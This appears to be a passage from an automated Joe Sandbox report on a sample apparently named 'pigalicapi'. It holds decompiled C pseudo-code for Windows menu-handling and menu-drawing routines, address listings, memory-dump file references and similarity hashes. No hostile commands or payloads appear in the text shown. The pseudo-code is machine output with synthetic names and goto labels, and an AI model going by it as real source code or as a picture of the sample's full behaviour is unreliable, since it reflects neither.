                                                                                                                                                                                                                                                                                          									_t140 =  *(_t139 + 4);
                                                                                                                                                                                                                                                                                          									if(_t140 == 0) {
                                                                                                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t159 =  *_t140;
                                                                                                                                                                                                                                                                                          									if(_t159 == 0) {
                                                                                                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									while(_t159 != 0x26) {
                                                                                                                                                                                                                                                                                          										_t140 = CharNextA(_t140);
                                                                                                                                                                                                                                                                                          										_t159 =  *_t140;
                                                                                                                                                                                                                                                                                          										if(_t159 != 0) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L26;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									if( *_t140 == 0) {
                                                                                                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t162 = _t140[1];
                                                                                                                                                                                                                                                                                          									_v356 = CharLowerA(_a4 & 0x0000ffff);
                                                                                                                                                                                                                                                                                          									if(CharLowerA(_t140[1] & 0x0000ffff) != _v356) {
                                                                                                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									if(_v325 != 0) {
                                                                                                                                                                                                                                                                                          										_v332 = 3;
                                                                                                                                                                                                                                                                                          										L29:
                                                                                                                                                                                                                                                                                          										if(_v325 != 0) {
                                                                                                                                                                                                                                                                                          											_t170 = _v332;
                                                                                                                                                                                                                                                                                          											if(_t170 == 2) {
                                                                                                                                                                                                                                                                                          												PostMessageA( *(_t172 + 4), 0x448, 0xffffffff, 0);
                                                                                                                                                                                                                                                                                          												E00811570(_t172, _t170);
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t162 = _v340 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          											 *_v348 = 1;
                                                                                                                                                                                                                                                                                          											_v336 = (_t170 & 0x0000ffff) << 0x00000010 | _v340 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L47;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t162 = _t145 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          										_v340 = _t145 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          										_v325 = 1;
                                                                                                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                                                                                          						_v404.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v336 = 0;
                                                                                                                                                                                                                                                                                          				if(_t147 != 0xd) {
                                                                                                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                                                                                                          			}














































                                                                                                                                                                                                                                                                                          0x0080e8c9
                                                                                                                                                                                                                                                                                          0x0080e8d0
                                                                                                                                                                                                                                                                                          0x0080e8d4
                                                                                                                                                                                                                                                                                          0x0080e8d8
                                                                                                                                                                                                                                                                                          0x0080e8da
                                                                                                                                                                                                                                                                                          0x0080e8dd
                                                                                                                                                                                                                                                                                          0x0080e8e9
                                                                                                                                                                                                                                                                                          0x0080e8ec
                                                                                                                                                                                                                                                                                          0x0080e8ee
                                                                                                                                                                                                                                                                                          0x0080e8f4
                                                                                                                                                                                                                                                                                          0x0080e8fa
                                                                                                                                                                                                                                                                                          0x0080e90c
                                                                                                                                                                                                                                                                                          0x0080e90c
                                                                                                                                                                                                                                                                                          0x0080e916
                                                                                                                                                                                                                                                                                          0x0080e918
                                                                                                                                                                                                                                                                                          0x0080eb0d
                                                                                                                                                                                                                                                                                          0x0080eb0d
                                                                                                                                                                                                                                                                                          0x0080eb27
                                                                                                                                                                                                                                                                                          0x0080eb31
                                                                                                                                                                                                                                                                                          0x0080eb35
                                                                                                                                                                                                                                                                                          0x0080eb81
                                                                                                                                                                                                                                                                                          0x0080eb8f
                                                                                                                                                                                                                                                                                          0x0080eb95
                                                                                                                                                                                                                                                                                          0x0080eb9b
                                                                                                                                                                                                                                                                                          0x0080eba5
                                                                                                                                                                                                                                                                                          0x0080eba8
                                                                                                                                                                                                                                                                                          0x0080ebae
                                                                                                                                                                                                                                                                                          0x0080ebc1
                                                                                                                                                                                                                                                                                          0x0080ebc4
                                                                                                                                                                                                                                                                                          0x0080ebc7
                                                                                                                                                                                                                                                                                          0x0080ebd3
                                                                                                                                                                                                                                                                                          0x0080ebd6
                                                                                                                                                                                                                                                                                          0x0080ebd8
                                                                                                                                                                                                                                                                                          0x0080ebe8
                                                                                                                                                                                                                                                                                          0x0080ebee
                                                                                                                                                                                                                                                                                          0x0080ebf4
                                                                                                                                                                                                                                                                                          0x0080ebfa
                                                                                                                                                                                                                                                                                          0x0080ec09
                                                                                                                                                                                                                                                                                          0x0080ec0f
                                                                                                                                                                                                                                                                                          0x0080ec11
                                                                                                                                                                                                                                                                                          0x0080ec19
                                                                                                                                                                                                                                                                                          0x0080ec74
                                                                                                                                                                                                                                                                                          0x0080ec2a
                                                                                                                                                                                                                                                                                          0x0080ec2a
                                                                                                                                                                                                                                                                                          0x0080ec32
                                                                                                                                                                                                                                                                                          0x0080ec3a
                                                                                                                                                                                                                                                                                          0x0080ec42
                                                                                                                                                                                                                                                                                          0x0080ec42
                                                                                                                                                                                                                                                                                          0x0080ec47
                                                                                                                                                                                                                                                                                          0x0080ec4c
                                                                                                                                                                                                                                                                                          0x0080ec58
                                                                                                                                                                                                                                                                                          0x0080ec6f
                                                                                                                                                                                                                                                                                          0x0080ec6f
                                                                                                                                                                                                                                                                                          0x0080ec19
                                                                                                                                                                                                                                                                                          0x0080eb37
                                                                                                                                                                                                                                                                                          0x0080eb3a
                                                                                                                                                                                                                                                                                          0x0080eb45
                                                                                                                                                                                                                                                                                          0x0080eb4d
                                                                                                                                                                                                                                                                                          0x0080eb56
                                                                                                                                                                                                                                                                                          0x0080eb6a
                                                                                                                                                                                                                                                                                          0x0080eb6a
                                                                                                                                                                                                                                                                                          0x0080eb56
                                                                                                                                                                                                                                                                                          0x0080ec7a
                                                                                                                                                                                                                                                                                          0x0080ec83
                                                                                                                                                                                                                                                                                          0x0080ec90
                                                                                                                                                                                                                                                                                          0x0080ec90
                                                                                                                                                                                                                                                                                          0x0080e920
                                                                                                                                                                                                                                                                                          0x0080e926
                                                                                                                                                                                                                                                                                          0x0080eb07
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080eb07
                                                                                                                                                                                                                                                                                          0x0080e92d
                                                                                                                                                                                                                                                                                          0x0080e933
                                                                                                                                                                                                                                                                                          0x0080e935
                                                                                                                                                                                                                                                                                          0x0080e93b
                                                                                                                                                                                                                                                                                          0x0080e945
                                                                                                                                                                                                                                                                                          0x0080e94b
                                                                                                                                                                                                                                                                                          0x0080e953
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e959
                                                                                                                                                                                                                                                                                          0x0080e959
                                                                                                                                                                                                                                                                                          0x0080e9b4
                                                                                                                                                                                                                                                                                          0x0080e9b4
                                                                                                                                                                                                                                                                                          0x0080e9bd
                                                                                                                                                                                                                                                                                          0x0080e9d7
                                                                                                                                                                                                                                                                                          0x0080e9e5
                                                                                                                                                                                                                                                                                          0x0080e9ef
                                                                                                                                                                                                                                                                                          0x0080e9f9
                                                                                                                                                                                                                                                                                          0x0080ea07
                                                                                                                                                                                                                                                                                          0x0080ea94
                                                                                                                                                                                                                                                                                          0x0080ea94
                                                                                                                                                                                                                                                                                          0x0080ea9b
                                                                                                                                                                                                                                                                                          0x0080e960
                                                                                                                                                                                                                                                                                          0x0080e966
                                                                                                                                                                                                                                                                                          0x0080e971
                                                                                                                                                                                                                                                                                          0x0080e987
                                                                                                                                                                                                                                                                                          0x0080e991
                                                                                                                                                                                                                                                                                          0x0080e996
                                                                                                                                                                                                                                                                                          0x0080e999
                                                                                                                                                                                                                                                                                          0x0080e9a0
                                                                                                                                                                                                                                                                                          0x0080e9b2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e9b2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea19
                                                                                                                                                                                                                                                                                          0x0080ea19
                                                                                                                                                                                                                                                                                          0x0080ea21
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea2b
                                                                                                                                                                                                                                                                                          0x0080ea2b
                                                                                                                                                                                                                                                                                          0x0080ea30
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea32
                                                                                                                                                                                                                                                                                          0x0080ea36
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea38
                                                                                                                                                                                                                                                                                          0x0080ea3e
                                                                                                                                                                                                                                                                                          0x0080ea44
                                                                                                                                                                                                                                                                                          0x0080ea48
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea4a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea4a
                                                                                                                                                                                                                                                                                          0x0080ea48
                                                                                                                                                                                                                                                                                          0x0080ea4f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea51
                                                                                                                                                                                                                                                                                          0x0080ea67
                                                                                                                                                                                                                                                                                          0x0080ea79
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea82
                                                                                                                                                                                                                                                                                          0x0080eaa3
                                                                                                                                                                                                                                                                                          0x0080eaad
                                                                                                                                                                                                                                                                                          0x0080eab4
                                                                                                                                                                                                                                                                                          0x0080eaba
                                                                                                                                                                                                                                                                                          0x0080eac3
                                                                                                                                                                                                                                                                                          0x0080ead2
                                                                                                                                                                                                                                                                                          0x0080eada
                                                                                                                                                                                                                                                                                          0x0080eada
                                                                                                                                                                                                                                                                                          0x0080eadf
                                                                                                                                                                                                                                                                                          0x0080eaf4
                                                                                                                                                                                                                                                                                          0x0080eafa
                                                                                                                                                                                                                                                                                          0x0080eafa
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea84
                                                                                                                                                                                                                                                                                          0x0080ea84
                                                                                                                                                                                                                                                                                          0x0080ea87
                                                                                                                                                                                                                                                                                          0x0080ea8d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea8d
                                                                                                                                                                                                                                                                                          0x0080ea82
                                                                                                                                                                                                                                                                                          0x0080ea21
                                                                                                                                                                                                                                                                                          0x0080ea07
                                                                                                                                                                                                                                                                                          0x0080e9cd
                                                                                                                                                                                                                                                                                          0x0080e9cd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e9cd
                                                                                                                                                                                                                                                                                          0x0080e953
                                                                                                                                                                                                                                                                                          0x0080e8fc
                                                                                                                                                                                                                                                                                          0x0080e90a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ItemMenu_memset$CharCountInfoMessageNextPostVersion
                                                                                                                                                                                                                                                                                          • String ID: ,$/$?$Z$d
                                                                                                                                                                                                                                                                                          • API String ID: 3606643131-2349203295
                                                                                                                                                                                                                                                                                          • Opcode ID: 8431b4d51f2224e290de8331c2e949bd13d8cbc45fab15d044eb49a4e2735c66
                                                                                                                                                                                                                                                                                          • Instruction ID: 16dbb72db68da19c11a259b88363fbb42921451b0ffc352add614ab604398186
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8431b4d51f2224e290de8331c2e949bd13d8cbc45fab15d044eb49a4e2735c66
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BA14E70A002289FEBB0CF64CC88BEABBB5FF59704F108499E549E7291D7715A81CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                          			E00812230(void* __ecx, int _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v28;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v44;
                                                                                                                                                                                                                                                                                          				long _v48;
                                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v64;
                                                                                                                                                                                                                                                                                          				int _v68;
                                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                                                                                          				signed int _v80;
                                                                                                                                                                                                                                                                                          				signed int _v84;
                                                                                                                                                                                                                                                                                          				signed int _v88;
                                                                                                                                                                                                                                                                                          				int _v92;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v140;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t121;
                                                                                                                                                                                                                                                                                          				signed int _t124;
                                                                                                                                                                                                                                                                                          				long _t132;
                                                                                                                                                                                                                                                                                          				signed int _t141;
                                                                                                                                                                                                                                                                                          				signed int _t143;
                                                                                                                                                                                                                                                                                          				signed int _t148;
                                                                                                                                                                                                                                                                                          				intOrPtr _t151;
                                                                                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                                                                                          				int _t167;
                                                                                                                                                                                                                                                                                          				int _t168;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t169;
                                                                                                                                                                                                                                                                                          				RECT* _t192;
                                                                                                                                                                                                                                                                                          				long _t194;
                                                                                                                                                                                                                                                                                          				long _t200;
                                                                                                                                                                                                                                                                                          				signed int _t203;
                                                                                                                                                                                                                                                                                          				int _t215;
                                                                                                                                                                                                                                                                                          				long _t234;
                                                                                                                                                                                                                                                                                          				intOrPtr _t235;
                                                                                                                                                                                                                                                                                          				signed int _t238;
                                                                                                                                                                                                                                                                                          				long _t250;
                                                                                                                                                                                                                                                                                          				void* _t252;
                                                                                                                                                                                                                                                                                          				int _t253;
                                                                                                                                                                                                                                                                                          				signed int _t255;
                                                                                                                                                                                                                                                                                          				int _t258;
                                                                                                                                                                                                                                                                                          				signed int _t262;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t121 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v12 = _t121 ^ _t262;
                                                                                                                                                                                                                                                                                          				_t252 = __ecx;
                                                                                                                                                                                                                                                                                          				_v68 = _a4;
                                                                                                                                                                                                                                                                                          				_t124 =  *(__ecx + 0x10);
                                                                                                                                                                                                                                                                                          				_v76 =  *((intOrPtr*)(__ecx + 0x2c));
                                                                                                                                                                                                                                                                                          				_t255 = _t124 & 0x00000001;
                                                                                                                                                                                                                                                                                          				_v64 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                                                                                                                                                                                                          				_t192 = __ecx + 0x1c;
                                                                                                                                                                                                                                                                                          				_v80 = _t124 & 0x00000002;
                                                                                                                                                                                                                                                                                          				_v84 = _t255;
                                                                                                                                                                                                                                                                                          				_v88 = _t124 & 0x00000008;
                                                                                                                                                                                                                                                                                          				if(_t255 != 0) {
                                                                                                                                                                                                                                                                                          					FillRect(_v64, _t192, GetSysColorBrush(0x1d));
                                                                                                                                                                                                                                                                                          					FrameRect(_v64, _t192, GetSysColorBrush(0xd));
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(__ecx + 0xc)) == 2) {
                                                                                                                                                                                                                                                                                          						FillRect(_v64, _t192, GetSysColorBrush(4));
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(( *(_v76 + 8) & 0x00000800) == 0) {
                                                                                                                                                                                                                                                                                          					__eflags =  *(_t252 + 8) - 0xffff;
                                                                                                                                                                                                                                                                                          					if( *(_t252 + 8) == 0xffff) {
                                                                                                                                                                                                                                                                                          						_v84 = 0;
                                                                                                                                                                                                                                                                                          						_t255 = _v84;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t132 = _t192->left;
                                                                                                                                                                                                                                                                                          					_t200 = _t192->top;
                                                                                                                                                                                                                                                                                          					_v28.left = _t132;
                                                                                                                                                                                                                                                                                          					_v28.right =  *((intOrPtr*)(_v68 + 0x98)) + _t132;
                                                                                                                                                                                                                                                                                          					_t234 =  *((intOrPtr*)(_v68 + 0x9c)) + _t200;
                                                                                                                                                                                                                                                                                          					_v28.bottom = _t234;
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					_v28.top = _t200;
                                                                                                                                                                                                                                                                                          					OffsetRect( &_v28, 0, _t192->bottom - _t200 - _t234 + _t200 - _t234 >> 1);
                                                                                                                                                                                                                                                                                          					__eflags = _v88;
                                                                                                                                                                                                                                                                                          					if(_v88 != 0) {
                                                                                                                                                                                                                                                                                          						_v44.top = _v28.top;
                                                                                                                                                                                                                                                                                          						_v44.left = _v28.left;
                                                                                                                                                                                                                                                                                          						_v44.right = _v28.right;
                                                                                                                                                                                                                                                                                          						_v44.bottom = _v28.bottom;
                                                                                                                                                                                                                                                                                          						InflateRect( &_v44, 0xffffffff, 0xffffffff);
                                                                                                                                                                                                                                                                                          						__eflags = _t255;
                                                                                                                                                                                                                                                                                          						if(_t255 != 0) {
                                                                                                                                                                                                                                                                                          							FillRect(_v64,  &_v44, GetSysColorBrush(4));
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						FrameRect(_v64,  &_v44, GetSysColorBrush(0xd));
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t235 = _v76;
                                                                                                                                                                                                                                                                                          					_t141 =  *(_t235 + 0x10);
                                                                                                                                                                                                                                                                                          					_v92 = _t141;
                                                                                                                                                                                                                                                                                          					__eflags = _t141;
                                                                                                                                                                                                                                                                                          					if(_t141 < 0) {
                                                                                                                                                                                                                                                                                          						E00816820( &_v140, 0, 0x30);
                                                                                                                                                                                                                                                                                          						_v140.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          						_t143 = E00804890(_t192, _t252, _t255);
                                                                                                                                                                                                                                                                                          						__eflags = _t143;
                                                                                                                                                                                                                                                                                          						if(_t143 != 0) {
                                                                                                                                                                                                                                                                                          							_v140.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v140.fMask = 0x18;
                                                                                                                                                                                                                                                                                          						GetMenuItemInfoA( *(_t252 + 0x14),  *(_t252 + 8), 0,  &_v140);
                                                                                                                                                                                                                                                                                          						_t238 = _v88;
                                                                                                                                                                                                                                                                                          						_t203 = _v140.hbmpUnchecked;
                                                                                                                                                                                                                                                                                          						__eflags = _t238;
                                                                                                                                                                                                                                                                                          						if(_t238 != 0) {
                                                                                                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                                                                                                          							_t148 = _v140.fType >> 0x00000009 & 0x00000001;
                                                                                                                                                                                                                                                                                          							__eflags = _t238;
                                                                                                                                                                                                                                                                                          							if(_t238 != 0) {
                                                                                                                                                                                                                                                                                          								_t203 = _v140.hbmpChecked;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							E00812E10( &_v64,  &_v28, _v68, _t255, _v80, _t148, _t203);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							__eflags = _t203;
                                                                                                                                                                                                                                                                                          							if(_t203 != 0) {
                                                                                                                                                                                                                                                                                          								goto L23;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t253 = _v68;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t253 = _v68;
                                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                                          						_v72 = _v28.right -  *((intOrPtr*)(_t253 + 0x90)) - _v28.left - _t235 >> 1;
                                                                                                                                                                                                                                                                                          						_t215 = _v72 + _v28.left;
                                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                                          						_t167 = (_v28.bottom -  *((intOrPtr*)(_t253 + 0x94)) - _v28.top - _t235 >> 1) + _v28.top;
                                                                                                                                                                                                                                                                                          						__eflags = _v80;
                                                                                                                                                                                                                                                                                          						_v72 = _t215;
                                                                                                                                                                                                                                                                                          						_v68 = _t167;
                                                                                                                                                                                                                                                                                          						if(_v80 != 0) {
                                                                                                                                                                                                                                                                                          							__eflags = _t255;
                                                                                                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                                                                                                          								_t168 = 4;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _v88;
                                                                                                                                                                                                                                                                                          								_t168 = 0x1d;
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									goto L17;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t169 = GetSysColorBrush(_t168);
                                                                                                                                                                                                                                                                                          							E00812D30( &_v64, _t253, __eflags,  &_v64, _v92, _t169, _t169, GetSysColorBrush(0x10), _v72, _v68);
                                                                                                                                                                                                                                                                                          							_t255 = _v84;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							ImageList_Draw( *(_t253 + 0x48), _v92, _v64, _t215, _t167, 1);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t151 =  *((intOrPtr*)(_t253 + 0x98));
                                                                                                                                                                                                                                                                                          					_v56 = _t192->top;
                                                                                                                                                                                                                                                                                          					_t193 = _t192->bottom;
                                                                                                                                                                                                                                                                                          					_v52 = _t192->right - _t151;
                                                                                                                                                                                                                                                                                          					_v48 = _t192->bottom;
                                                                                                                                                                                                                                                                                          					_v60 = _t192->left + _t151 + 3;
                                                                                                                                                                                                                                                                                          					SetBkMode(_v64, 1);
                                                                                                                                                                                                                                                                                          					__eflags = _v80;
                                                                                                                                                                                                                                                                                          					if(_v80 == 0) {
                                                                                                                                                                                                                                                                                          						asm("sbb esi, esi");
                                                                                                                                                                                                                                                                                          						_t258 = ( ~_t255 & 0x00000007) + 7;
                                                                                                                                                                                                                                                                                          						__eflags = _t258;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__eflags = _t255;
                                                                                                                                                                                                                                                                                          						_t115 = (0 | _t255 != 0x00000000) + 0x10; // 0x10
                                                                                                                                                                                                                                                                                          						_t258 = _t115;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t155 = E00812C90( *((intOrPtr*)(_v76 + 4)), _t253,  &_v64,  &_v60, GetSysColor(_t258));
                                                                                                                                                                                                                                                                                          					__eflags = _v12 ^ _t262;
                                                                                                                                                                                                                                                                                          					return E008159E6(_t155, _t193, _v12 ^ _t262,  &_v64, _t253,  *((intOrPtr*)(_v76 + 4)));
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t250 = _t192->right;
                                                                                                                                                                                                                                                                                          					_v44.left = _t192->left;
                                                                                                                                                                                                                                                                                          					_t194 = _t192->bottom;
                                                                                                                                                                                                                                                                                          					_v44.right = _t250;
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					_v44.top = _t192->top + (_t194 - _t192->top - _t250 >> 1);
                                                                                                                                                                                                                                                                                          					_v44.bottom = _t194;
                                                                                                                                                                                                                                                                                          					return E008159E6(DrawEdge(_v64,  &_v44, 6, 2), _t194, _v12 ^ _t262, _t250, _t252, _t255);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}















































                                                                                                                                                                                                                                                                                          0x00812239
                                                                                                                                                                                                                                                                                          0x00812240
                                                                                                                                                                                                                                                                                          0x00812249
                                                                                                                                                                                                                                                                                          0x00812251
                                                                                                                                                                                                                                                                                          0x00812254
                                                                                                                                                                                                                                                                                          0x00812257
                                                                                                                                                                                                                                                                                          0x0081225e
                                                                                                                                                                                                                                                                                          0x00812267
                                                                                                                                                                                                                                                                                          0x0081226a
                                                                                                                                                                                                                                                                                          0x0081226d
                                                                                                                                                                                                                                                                                          0x00812270
                                                                                                                                                                                                                                                                                          0x00812273
                                                                                                                                                                                                                                                                                          0x00812278
                                                                                                                                                                                                                                                                                          0x008122f5
                                                                                                                                                                                                                                                                                          0x00812309
                                                                                                                                                                                                                                                                                          0x0081227a
                                                                                                                                                                                                                                                                                          0x0081227e
                                                                                                                                                                                                                                                                                          0x0081228e
                                                                                                                                                                                                                                                                                          0x0081228e
                                                                                                                                                                                                                                                                                          0x0081227e
                                                                                                                                                                                                                                                                                          0x0081229e
                                                                                                                                                                                                                                                                                          0x00812316
                                                                                                                                                                                                                                                                                          0x0081231a
                                                                                                                                                                                                                                                                                          0x0081231c
                                                                                                                                                                                                                                                                                          0x00812323
                                                                                                                                                                                                                                                                                          0x00812323
                                                                                                                                                                                                                                                                                          0x00812326
                                                                                                                                                                                                                                                                                          0x00812331
                                                                                                                                                                                                                                                                                          0x00812336
                                                                                                                                                                                                                                                                                          0x0081233c
                                                                                                                                                                                                                                                                                          0x0081234a
                                                                                                                                                                                                                                                                                          0x00812350
                                                                                                                                                                                                                                                                                          0x00812353
                                                                                                                                                                                                                                                                                          0x00812359
                                                                                                                                                                                                                                                                                          0x00812362
                                                                                                                                                                                                                                                                                          0x00812368
                                                                                                                                                                                                                                                                                          0x0081236c
                                                                                                                                                                                                                                                                                          0x00812379
                                                                                                                                                                                                                                                                                          0x0081237c
                                                                                                                                                                                                                                                                                          0x00812388
                                                                                                                                                                                                                                                                                          0x0081238b
                                                                                                                                                                                                                                                                                          0x0081238e
                                                                                                                                                                                                                                                                                          0x00812394
                                                                                                                                                                                                                                                                                          0x00812396
                                                                                                                                                                                                                                                                                          0x008123a9
                                                                                                                                                                                                                                                                                          0x008123a9
                                                                                                                                                                                                                                                                                          0x008123c0
                                                                                                                                                                                                                                                                                          0x008123c0
                                                                                                                                                                                                                                                                                          0x008123c6
                                                                                                                                                                                                                                                                                          0x008123c9
                                                                                                                                                                                                                                                                                          0x008123cc
                                                                                                                                                                                                                                                                                          0x008123cf
                                                                                                                                                                                                                                                                                          0x008123d1
                                                                                                                                                                                                                                                                                          0x00812483
                                                                                                                                                                                                                                                                                          0x0081248b
                                                                                                                                                                                                                                                                                          0x00812495
                                                                                                                                                                                                                                                                                          0x0081249a
                                                                                                                                                                                                                                                                                          0x0081249c
                                                                                                                                                                                                                                                                                          0x0081249e
                                                                                                                                                                                                                                                                                          0x0081249e
                                                                                                                                                                                                                                                                                          0x008124b9
